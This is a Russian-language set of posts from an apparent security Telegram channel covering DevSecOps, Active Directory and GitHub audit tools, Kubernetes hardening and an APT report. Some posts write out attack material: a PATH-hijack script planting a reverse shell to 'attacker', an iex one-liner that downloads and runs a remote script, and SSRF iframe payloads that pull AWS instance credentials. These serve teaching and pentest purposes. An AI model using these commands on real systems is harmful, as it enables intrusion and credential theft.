📝 Что такое DevSecOps

DevSecOps — целый подход, когда безопасность включается в каждый этап разработки. Она не мешает процессу, а усиливает его.

⏺Security Checks & Scans: Автоматический анализ кода помогает находить уязвимости до выхода в прод. Используются статические и динамические проверки.

⏺Continuous Monitoring: Системы следят за логами, действиями пользователей и трафиком. Это позволяет вовремя реагировать на угрозы.

⏺CI/CD: Автоматизированные пайплайны включают встроенные проверки безопасности. Код проверяется до и после сборки.

⏺Infrastructure as Code: Инфраструктура управляется через код. Это даёт контроль, повторяемость и возможность проверять конфигурации.

⏺Container Security: Контейнеры и образы сканируются на этапе сборки. Рантайм-контроль обеспечивает безопасность во время работы.

⏺Key Management: Доступ к секретам централизуется. Ключи и токены хранятся в защищённых системах вроде Vault.

⏺Threat Modeling: Угрозы рассматриваются ещё до написания кода. Архитектура проектируется с учётом потенциальных атак.

⏺QA Integration: Проверки безопасности становятся частью тестирования. Это снижает риски ещё на этапе контроля качества.

⏺Collaboration and Communication: Dev, Sec и Ops работают вместе. Безопасность — это совместная задача, а не чья-то обязанность.

⏺Vulnerability Management: Уязвимости выявляются, отслеживаются и устраняются постоянно. Работа с ними встроена в ежедневные процессы.

ZeroDay | #ИБ

👋 Приветствую в мире цифровой безопасности!

Сделал для вас новую подборку крутых бесплатных курсов по ИБ и не только на YouTube.

⏺ CS50 курс по кибербезу
⏺ Полный курс за 11 часов
⏺ Учимся кибербезу с нуля до про
⏺ Курс по OSINT
⏺ Linux для этичных хакеров

ZeroDay | #Подборка

Руководство по pgcrypto — шифруем данные прямо в PostgreSQL. Часть 2

Если хотим хранить важные данные в базе под надежной защитой, но нет желания заморачиваться с отдельными сервисами - pgcrypto поможет сделать это прямо внутри PostgreSQL.

⏺В этой статье расскажу, как на практике использовать pgcrypto: шифруем колонки, хешируем пароли, проверяем, что данные не подменили, и даже передаем зашифрованные сообщения через PGP. При этом разберем, как не убить производительность. Криптография требует ресурсов, и с этим нужно уметь работать.

ZeroDay | #Статья

Invoke-ADEnum: автоматизация аудита Active Directory

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: Invoke-ADEnum - PowerShell-скрипт, который моментально собирает тонну полезной информации по вашему AD.

⏺Что умеет: за один запуск вы получите полный отчёт по пользователям, группам, компьютерам, политике паролей, GPO и другим важным штукам. Всё это красиво оформлено в HTML с возможностью выгрузки в CSV и XLSX - чтобы показать коллегам или использовать для анализа.

⏺Как использовать: запустите скрипт на любой машине с доступом к домену и вот, у вас готов детальный аудит. Не обязательно быть в домене, главное - это доступ.

Вот пример простого запуска:

.\Invoke-ADEnum.ps1 -ReportPath .\ADReport.html

Делаем пост с использованием на практике?

ZeroDay | #Инструмент

Invoke-ADEnum: аудит Active Directory за пару минут

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём, как быстро собрать информацию о структуре Active Directory.

⏺Сценарий: вы проводите аудит или делаете ревизию AD-инфраструктуры. Вручную собирать сведения о пользователях, группах, GPO и правах доступа - долго и неудобно. Поэтому юзаем Invoke-ADEnum.

⏺Пример запуска:

# Загрузка скрипта в память
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1')

# Запуск полной проверки
Invoke-ADEnum -AllEnum -Force

⏺Или более точечно - поиск локальных админов, RBCD и подозрительных GPO:

Invoke-ADEnum -FindLocalAdminAccess -RBCD -UserCreatedObjects -GPOsRights -MoreGPOs -AllDescriptions

Вы можете запускать скрипт даже с машины вне домена. Главное, чтобы был доступ к AD.

ZeroDay | #инструмент

3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.

⏺SSH подмена через ProxyCommand: Когда у цели открыт SSH, но нужен MITM, используйем подмену через ProxyCommand:

Host target
    ProxyCommand ncat --proxy attacker_ip:1080 --proxy-type socks5 %h %p

⏺SUID-бинарники: но не find, а getcap: Часто забывают, что кроме SUID есть capabilities, которые тоже дают root-like поведение. Быстрый способ найти:

getcap -r / 2>/dev/null

Если увидишь, например:

/usr/bin/python3 = cap_setuid+ep

Поздравляю, у вас фактически шелл от рута без эксплойтов.

⏺Подмена скриптов через PATH-атаку: Когда у вас доступ к конфигам, или вы находите странный cron, проверьте, вызываются ли команды с абсолютным путём. Если нет, можно создать свой ls, tar, cp, подменить PATH, и получить выполнение:

echo "/tmp" > /etc/cron.d/fakelist
echo -e '#!/bin/bash\nnc attacker 4444 -e /bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH

ZeroDay | #пентест

Как я устал тестировать LLM вручную, и сделал универсальный сканер уязвимостей

Когда ты в сотый раз копипастишь один и тот же prompt в чат-бота, приходит озарение: «А зачем вообще это делает человек, если у нас есть ИИ?» Так родился сканер для LLM: тестирует на уязвимости, как будто это веб-приложение, только вместо SQL-инъекций prompt injection.

⏺В статье рассказывается, как обычный корпоративный бот на RAG вдруг начал сливать конфиденциалку, как выглядят настоящие атаки на LLM, и как я автоматизировал проверку на prompt injection, data leakage и context abuse.

ZeroDay | #Статья

Deluder: перехват трафика там, где прокси бессильны

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Что это: Deluder - это инструмент для перехвата трафика у приложений, которые не умеют работать с прокси. Да, таких много. Использует Frida и динамическую инструментацию, чтобы внедриться в сетевые библиотеки прямо в реальном времени. Поддерживает WinSock, OpenSSL, GnuTLS, SChannel и даже обычные Linux sockets.

⏺Почему это удобно: Потому что вам не надо ничего патчить. Просто цепляемся к процессу - и начинаем наблюдать трафик даже у десктопных GUI-программ, которые вообще не подозревают о MITM. Отлично дружит с PETEP, но можно использовать и отдельно.

ZeroDay | #Инструмент

Как превратить простую HTML-инъекцию в SSRF с помощью рендеринга PDF

👋 Приветствую в мире цифровой безопасности!

Сегодня покажу, как простая HTML-инъекция в генераторе сертификатов привела к с SSRF с утечкой AWS-доступа.

⏺С чего всё началось: Тестируя сайт онлайн-курсов, я почти ушёл ни с чем. Но потом наткнулся на сертификат, который генерируется сервером в PDF или PNG после завершения курса. Можно было ввести name, title и quote.

⏺Первые находки: В параметре title HTML не фильтровался.

➡️"<i>ahmed</i>" — текст стал курсивом.
➡️"<iframe src='https://sub.0xxnum.fun/test'></iframe>" — сработало.

А вот script, onerror и XSS не сработали. Это была HTML-инъекция, но рендер происходил на бэке.

⏺Что это дало: PDF-генерация происходила через headless-браузер. Это означало, что я могу встроить <iframe> с URL, и сервер сам сделает запрос. Привет, SSRF.

⏺Дальше еще интереснее: Я начал направлять iframe на локальные ресурсы (http://127.0.0.1:3000, 169.254.169.254) — и получил неожиданный ответ в PDF. Так, постепенно я добрался до метаданных AWS EC2-инстанса и вытянул access tokens.

⏺Что сработало:

"title": "<iframe src='http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name'></iframe>"

Делаем вторую часть?

ZeroDay | #атака

Как превратить простую HTML-инъекцию в SSRF с помощью рендеринга PDF. Ч.2

👋 Приветствую в мире цифровой безопасности!

Сегодня продолжу говорить про то, как простая HTML-инъекция в генераторе сертификатов привела к с SSRF с утечкой AWS-доступа.

⏺Подтверждаем SSRF: После того как <iframe> с внешним URL сработал, я захотел понять — а сервер точно сам ходит по этим ссылкам? Для этого сделал редирект на свой контролируемый домен:

"title": "<iframe src='http://sub.tarek.dev/probe'></iframe>"

И, как только PDF был сгенерирован, я получил DNS и HTTP-запрос на свой listener. Это подтвердило: HTML рендерится браузероподобным инструментом, и сервер действительно загружает внешние ресурсы.

⏺Выход на метаданные AWS: SSRF был налицо, и я перешёл к следующей цели - 169.254.169.254 — стандартному адресу метаданных AWS-инстансов.

"title": "<iframe src='http://169.254.169.254/latest/meta-data/'></iframe>"

PDF вернулся с содержимым страницы метаданных. Я пошёл дальше - запрашиваю IAM credentials:

"title": "<iframe src='http://169.254.169.254/latest/meta-data/iam/security-credentials/'></iframe>"

Вижу имя роли, например, my-app-instance-role.

⏺Финальный удар - доступ к AWS: Теперь знаю имя роли, и нацеливаюсь точнее:

"title": "<iframe src='http://169.254.169.254/latest/meta-data/iam/security-credentials/my-app-instance-role'></iframe>"

В PDF прилетели:
• AccessKeyId
• SecretAccessKey
• Token

Эти временные креды можно было использовать для доступа к S3, DynamoDB, CloudWatch и другим сервисам AWS, в зависимости от привилегий роли.

⏺И насчет user-data: А вдруг dev-опсы оставили что-то интересное в скриптах и переменных окружения?

"title": "<iframe src='http://169.254.169.254/latest/user-data'></iframe>"

Иногда там лежат secrets, API-токены, начальные скрипты с логикой деплоя.

ZeroDay | #атака

Как китайские APT-группы охотятся на тибетцев

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажем о том, как APT-группы, связанные с Китаем, устроили охоту на тибетскую диаспору с помощью фальшивых сайтов, мессенджеров и «поздравлений» ко дню рождения Далай-ламы.

⏺Всё началось с аккуратной подмены: на легитимном сайте tibetfund[.]org ссылку на поздравления заменили на копию - thedalailama90[.]niccenter[.]net. Там «по-тихому» предлагался мессенджер TElement, якобы безопасный, тибетский аналог Element.

⏺Но внутри прятался Gh0st RAT: это старый знакомый среди троянов. Он умеет слушать микрофон, записывать экран, стягивать файлы и вообще вести себя как незваный гость, который обустроился надолго.

⏺Вторая часть атаки: приложение “DalaiLamaCheckin.exe”, где юзеру предлагали “отметиться” на карте и отправить добрые слова. А в фоновом режиме запускался PhantomNet — скрытный бэкдор с загрузкой плагинов по команде C2-сервера и возможностью включаться строго по таймеру.

⏺И всё это аккуратно замаскировано под искренние поздравления и общение. Вирусы прятались в мессенджере, а шпионаж по сути за маской духовности 🤷‍♂️

ZeroDay | #разное

Хакаем прошивку кнопочного телефона и пишем для него программы

Когда-то кнопочные телефоны просто звонили и светились зелёным экраном. Но что если взять старенький Explay, вытащить из него прошивку, взломать файловый менеджер — и научить его запускать свои программы прямо с флешки?

⏺В статье рассказывается, как автор пошёл по стопам легенды моддинг-сцены, реверснул прошивку звонилки и написал свою версию «Змейки». Через дизассемблер, ассемблер и немного магии он добавляет в телефон полноценную систему запуска .app-файлов — почти как на Windows, только на микроконтроллере.

ZeroDay | #Статья

GitXray: рентген GitHub-репозиториев

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺GitXray — буквально «рентген» GitHub‑репозиториев. Работает через публичные REST API и помогает вытаскивать скрытые данные для OSINT, пентестов и цифровой криминалистики.

⏺Зачем это: вместо листания часами коммиты, GitXray за минуты находит случайно слитые ключи, фейковые аккаунты, подозрительные изменения после релиза и активности, совпавшие с датой атаки.

⏺Например, с ним можно вычислить скрытого злоумышленника в коммитах к популярному репозиторию, отследить накрутку звёзд для создания реального вида у фейкового проекта или заметить подмену бинарника, загруженного спустя дни после релиза.

⏺Запуск анализа конкретного репозитория:

gitxray -r https://github.com/some-org/some-repo

Фильтрация результатов по ключам:

gitxray -r https://github.com/some-org/some-repo -f user_input,keys -outformat text

Запуск по всей организации с выводом списка репозиториев и контрибьюторов:

gitxray -o https://github.com/exampleOrg --list

ZeroDay | #Инструмент

Хакер‑легенда HD Moore: от ПК с мусорки до Metasploit Framework

👋 Приветствую в мире цифровой безопасности!

Сегодня разберём историю человека, который доказал: чтобы изменить кибербезопасность, не нужны миллионы и дипломы из Стэнфорда.

⏺Старт с нуля: Джеймс «HD» Мур вырос в бедности и собирал свой первый компьютер… из выброшенных деталей. IRC‑чаты стали его школой: там он изучал фрикинг и уязвимости ПО, пока его сверстники сидели на уроках. В 16 лет он бросил школу и целыми днями занимался хакингом, и это стало отправной точкой.

⏺Военные, которые дали шанс: Случайная переписка в IRC привела его в компанию, сотрудничавшую с ВВС США. Задача — писать эксплойты и искать слабые места. Не имея диплома, Мур получил уникальный опыт: его хакинг впервые стал «легальным», а подход «функциональность важнее красоты» позже станет философией Metasploit.

⏺Как это повлияло: Тогда хакерские группы вроде TESO и LSD держали эксплойты в закрытых клубах. Новички не имели шансов. Коммерческие решения вроде Core Impact стоили десятки тысяч долларов. Пентестеры были вынуждены искать код на сомнительных форумах и рисковать. Мур понял: нужен инструмент, который будет доступен каждому и не потребует тайных связей.

⏺Рождение Metasploit: В 2003 году появилась первая версия Metasploit. Всего 11 эксплойтов и 27 payload’ов на Perl. Но главное — модульность: эксплойты, полезные нагрузки и обходы защиты можно было комбинировать, как LEGO. Позже проект переписали на Ruby, и сообщество подключилось к его развитию. Metasploit стал тем, чем сегодня пользуются и белые, и чёрные хакеры, и даже спецслужбы.

ZeroDay | #безопасность

Закрываем Kubernetes API Server для других

👋 Приветствую в мире цифровой безопасности!

Расскажу, как выстроить базовую защиту в Kubernetes API.

⏺Kubernetes API Server - часто, как главный пульт управления вашим кластером. Оставить его открытым и без защиты, почти что как бросить ключи от сервера на видном месте. Так делать не надо 😉

⏺Начинаем с того, что ограничиваем, на каких интерфейсах API Server слушает запросы. По умолчанию - все подряд. Лучше сделать так, чтобы сервер отвечал только на localhost или внутри вашей приватной сети.

--bind-address=127.0.0.1
--advertise-address=10.10.10.10

⏺Не забываем про аутентификацию и авторизацию: строгие клиентские сертификаты, RBAC и webhook-аутентификация — без них никаких «дверей» в кластер.

⏺Даже с защитой по TLS не стоит давать доступ всем подряд. Настраиваем firewall, чтобы API Server принимал подключения только с доверенных IP.

iptables -A INPUT -p tcp --dport 6443 -s 10.10.0.0/16 -j ACCEPT
iptables -A INPUT -p tcp --dport 6443 -j DROP

⏺Включаем аудит: пусть все запросы записываются в лог. Это поможет заметить любые странные или подозрительные действия.

--audit-log-path=/var/log/kube/audit.log
--audit-log-maxage=30
--audit-log-maxbackup=5
--audit-log-maxsize=100

⏺И еще важно: используем admission controllers. Они помогут заблокировать создание опасных ресурсов и контролировать поведение приложений.

ZeroDay | #безопасность